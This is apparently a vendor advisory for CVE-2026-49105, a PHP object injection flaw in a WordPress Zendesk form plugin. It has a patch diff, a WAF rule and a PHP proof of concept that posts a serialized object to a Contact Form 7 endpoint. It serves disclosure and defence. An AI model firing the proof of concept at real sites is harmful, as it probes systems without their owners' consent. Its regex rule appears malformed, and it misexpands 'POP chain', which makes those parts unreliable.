What is CVE-2026-49105?

CVE-2026-49105 is a high-severity vulnerability affecting the WP Zendesk for Contact Form 7, WPForms, Elementor, Formidable, and Ninja Forms plugin for WordPress. It allows unauthenticated attackers to exploit PHP Object Injection via deserialization of untrusted input, potentially leading to arbitrary code execution if a suitable payload chain exists.

Who is affected by this vulnerability?

Any WordPress site using the WP Zendesk plugin version 1.1.4 or earlier is at risk. Administrators should check their installed plugin versions to determine if they need to take action.

How can I check if my site is vulnerable?

To check if your site is vulnerable, navigate to the plugins section in your WordPress admin dashboard. Look for the WP Zendesk plugin and verify that the version is 1.1.4 or earlier.

How can I fix this vulnerability?

The vulnerability is fixed in version 1.1.5 of the WP Zendesk plugin. Update the plugin to this version or later to eliminate the risk of exploitation.

What does the CVSS score of 8.1 indicate?

A CVSS score of 8.1 indicates a high severity vulnerability. This means that successful exploitation could lead to significant impacts, including data loss or unauthorized access to sensitive information.

What is PHP Object Injection?

PHP Object Injection occurs when an application deserializes untrusted input, allowing an attacker to inject arbitrary PHP objects. This can lead to various attacks, depending on the context and available object methods.

What is a Proof of Concept (PoC)?

A Proof of Concept is a demonstration that shows how a vulnerability can be exploited. In this case, the PoC illustrates how an attacker can submit a crafted form to exploit the PHP Object Injection vulnerability.

What does the PoC code do?

The PoC code sends a serialized PHP object as part of a form submission to the vulnerable endpoint. This illustrates how an attacker could potentially exploit the vulnerability to inject malicious objects.

What are the potential risks if exploited?

If exploited, this vulnerability could allow an attacker to delete files, retrieve sensitive data, or execute arbitrary code on the server, depending on the presence of a suitable payload chain in other plugins or themes.

How does the patch mitigate the vulnerability?

The patch in version 1.1.5 comments out the vulnerable call to `maybe_unserialize($value)`, preventing the deserialization of untrusted input. This effectively removes the injection point and secures the plugin against this type of attack.

What should I do if I cannot update the plugin?

If you cannot update the plugin, consider disabling it until a patch can be applied. Additionally, review your site for other vulnerabilities and ensure that all other plugins and themes are up to date.

Are there any known exploits for this vulnerability?

As of now, there are no known active exploits specifically targeting this vulnerability. However, the potential for exploitation exists, and it is crucial to apply the patch to mitigate any risks.

A Payload Object Injection (POP) chain refers to a sequence of objects that can be manipulated to achieve a specific malicious outcome. In this vulnerability, a suitable POP chain in other installed plugins or themes could allow an attacker to execute harmful actions.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : June 13, 2026

CVE-2026-49105: WP Zendesk for Contact Form 7, WPForms, Elementor, Formidable and Ninja Forms <= 1.1.4 Unauthenticated PHP Object Injection PoC, Patch Analysis & Rule

CVE ID CVE-2026-49105

Plugin cf7-zendesk

Severity High (CVSS 8.1)

CWE 502

Vulnerable Version 1.1.4

Patched Version 1.1.5

Disclosed June 4, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-49105: The WP Zendesk for Contact Form 7, WPForms, Elementor, Formidable and Ninja Forms plugin for WordPress (versions up to and including 1.1.4) contains an unauthenticated PHP object injection vulnerability via deserialization of untrusted input. This issue has a CVSS score of 8.1 (CWE-502).

The root cause lies in the `vx_cf_zendesk` class within `/wp-content/plugins/cf7-zendesk/cf7-zendesk.php`. The vulnerable code is at line 962 (original). The `maybe_unserialize()` function unwraps user-supplied values without validation. Atomic Edge research identified that the vulnerable code path processes form field values where `$value` is a scalar (not an array) and then calls `maybe_unserialize($value)`. This deserializes attacker-controlled input, enabling PHP object injection.

An unauthenticated attacker can exploit this vulnerability by submitting a crafted form submission that includes a malicious serialized PHP object as a form field value. The plugin accepts these submissions via the Contact Form 7 or other integrated form endpoints. The attacker does not need any authentication or special privileges. The payload is delivered as a serialized string in the form data.

The patch in version 1.1.5 comments out the `maybe_unserialize($value)` call on line 962. Atomic Edge analysis shows this removes the vulnerable deserialization entirely. The patched code simply assigns `$value` without attempting to unserialize it. This breaks the injection point and prevents any PHP object deserialization from untrusted input.

If exploited and a suitable POP chain exists in an installed plugin or theme, this vulnerability could allow an attacker to delete arbitrary files, retrieve sensitive data, or execute arbitrary code. The impact depends on the available gadgets in the WordPress ecosystem. No POP chain exists in the vulnerable plugin itself, so exploitation requires additional components.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/cf7-zendesk/cf7-zendesk.php
+++ b/cf7-zendesk/cf7-zendesk.php
@@ -2,7 +2,7 @@
 /**
 * Plugin Name: Contact Form 7 Zendesk
 * Description: Integrates Contact Form 7, <a href="https://wordpress.org/plugins/contact-form-entries/">Contact Form Entries Plugin</a> and many other forms with Zendesk allowing form submissions to be automatically sent to your Zendesk account
-* Version: 1.1.4
+* Version: 1.1.5
 * Requires at least: 3.8
 * Author URI: https://www.crmperks.com
 * Plugin URI: https://www.crmperks.com/plugins/contact-form-plugins/contact-form-zendesk-plugin/
@@ -24,7 +24,7 @@
   public  $crm_name = "zendesk";
   public  $id = "vxcf_zendesk";
   public  $domain = "vxcf-zendesk";
-  public  $version = "1.1.4";
+  public  $version = "1.1.5";
   public  $update_id = "6000015";
   public  $min_cf_version = "1.0";
   public $type = "vxcf_zendesk";
@@ -959,7 +959,7 @@
       $value=$value['value'];
      }
      if(!is_array($value)){
-          $value=maybe_unserialize($value);
+         // $value=maybe_unserialize($value);
      }

   }

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-49105
# Block serialized PHP objects in form fields processed by CF7 Zendesk plugin
SecRule REQUEST_URI "@rx ^/wp-json/contact-form-7/vd+/contact-forms/" "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-49105 PHP Object Injection via CF7 Zendesk',severity:'CRITICAL',tag:'CVE-2026-49105'"
  SecRule ARGS_POST:your-message "@rx O:d+:" "chain"
    SecRule ARGS_POST:your-message "@rx O:d+:" "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-49105 - WP Zendesk for Contact Form 7, WPForms, Elementor, Formidable and Ninja Forms <= 1.1.4 - Unauthenticated PHP Object Injection

$target_url = 'http://example.com/wp-json/contact-form-7/v1/contact-forms/1/feedback'; // Adjust to your target's CF7 endpoint

// Simple serialized object (stdClass with a property) - real exploit requires a POP chain
$payload = serialize(new stdClass());

$data = array(
    'your-name' => 'Test',
    'your-email' => 'test@test.com',
    'your-message' => $payload, // Injected serialized object
    '_wpcf7_unit_tag' => 'wpcf7-f1-p2-o1',
    '_wpcf7_is_ajax_call' => '1'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));

$response = curl_exec($ch);
if (curl_errno($ch)) {
    echo 'Error: ' . curl_error($ch);
} else {
    echo 'Payload sent. Check server response for possible object injection effects.';
}
curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2026-49105?
Understanding the vulnerability
CVE-2026-49105 is a high-severity vulnerability affecting the WP Zendesk for Contact Form 7, WPForms, Elementor, Formidable, and Ninja Forms plugin for WordPress. It allows unauthenticated attackers to exploit PHP Object Injection via deserialization of untrusted input, potentially leading to arbitrary code execution if a suitable payload chain exists.
Who is affected by this vulnerability?
Identifying at-risk users
Any WordPress site using the WP Zendesk plugin version 1.1.4 or earlier is at risk. Administrators should check their installed plugin versions to determine if they need to take action.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, navigate to the plugins section in your WordPress admin dashboard. Look for the WP Zendesk plugin and verify that the version is 1.1.4 or earlier.
How can I fix this vulnerability?
Applying the necessary patch
The vulnerability is fixed in version 1.1.5 of the WP Zendesk plugin. Update the plugin to this version or later to eliminate the risk of exploitation.
What does the CVSS score of 8.1 indicate?
Understanding the severity level
A CVSS score of 8.1 indicates a high severity vulnerability. This means that successful exploitation could lead to significant impacts, including data loss or unauthorized access to sensitive information.
What is PHP Object Injection?
Explaining the technical aspect
PHP Object Injection occurs when an application deserializes untrusted input, allowing an attacker to inject arbitrary PHP objects. This can lead to various attacks, depending on the context and available object methods.
What is a Proof of Concept (PoC)?
Demonstrating the vulnerability
A Proof of Concept is a demonstration that shows how a vulnerability can be exploited. In this case, the PoC illustrates how an attacker can submit a crafted form to exploit the PHP Object Injection vulnerability.
What does the PoC code do?
Analyzing the demonstration code
The PoC code sends a serialized PHP object as part of a form submission to the vulnerable endpoint. This illustrates how an attacker could potentially exploit the vulnerability to inject malicious objects.
What are the potential risks if exploited?
Understanding the impact of exploitation
If exploited, this vulnerability could allow an attacker to delete files, retrieve sensitive data, or execute arbitrary code on the server, depending on the presence of a suitable payload chain in other plugins or themes.
How does the patch mitigate the vulnerability?
Details of the fix
The patch in version 1.1.5 comments out the vulnerable call to `maybe_unserialize($value)`, preventing the deserialization of untrusted input. This effectively removes the injection point and secures the plugin against this type of attack.
What should I do if I cannot update the plugin?
Mitigation strategies
If you cannot update the plugin, consider disabling it until a patch can be applied. Additionally, review your site for other vulnerabilities and ensure that all other plugins and themes are up to date.
Are there any known exploits for this vulnerability?
Current state of exploitation
As of now, there are no known active exploits specifically targeting this vulnerability. However, the potential for exploitation exists, and it is crucial to apply the patch to mitigate any risks.
What is a POP chain?
Explaining the concept in context
A Payload Object Injection (POP) chain refers to a sequence of objects that can be manipulated to achieve a specific malicious outcome. In this vulnerability, a suitable POP chain in other installed plugins or themes could allow an attacker to execute harmful actions.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started